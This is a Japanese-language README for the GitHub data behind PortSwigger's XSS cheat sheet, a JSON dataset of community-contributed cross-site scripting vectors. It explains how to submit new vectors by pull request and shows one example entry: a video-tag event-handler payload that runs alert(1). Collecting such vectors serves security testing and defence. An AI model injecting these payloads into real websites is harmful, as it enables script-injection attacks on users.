
PortSwigger XSSチートシートを支える、コミュニティ提供のXSSペイロードベクターのJSONデータセット。ブラウザサポートとインタラクションのメタデータ付き。
これはPortSwigger XSSチートシートを支えるデータです。コミュニティがプルリクエストを通じてベクターを貢献できるよう、このデータをGitHubに公開しています。
貢献するには、JSONデータへの変更を含むプルリクエストを作成してください。
例えば、データにonwaitingを追加するには、次のようにします:
"onwaiting": {
"description": "Fires when while waiting for the data",
"tags": [
{
"tag": "video",
"code": "<video controls onwaiting=alert(1)><source src=\"validvideo.mp4\" type=video\/mp4><\/video>",
"browsers": [
"edge"
],
"interaction": false
}
]
}
tags配列には、そのベクターがサポートするタグとブラウザサポートが含まれます。サポートされているブラウザはchrome、safari、firefox、edgeで、すべて小文字です。interactionフラグは、そのベクターがユーザー操作を必要とするかどうかを指定します。
あなたのベクターがすでに追加されていないか、必ずデータを検索して確認してください。 クレジットとしてTwitterハンドルを記載したい場合は、プルリクエストのメッセージに含めてください。
このプロジェクトの著作権はPortSwigger Web Securityに帰属します。このデータが他の場所でホストされる派生チートシートの作成に使用されることを望まないため、ライセンスは提供していません。とはいえ、プルリクエストを送るためにこのリポジトリをフォークすることは自由です。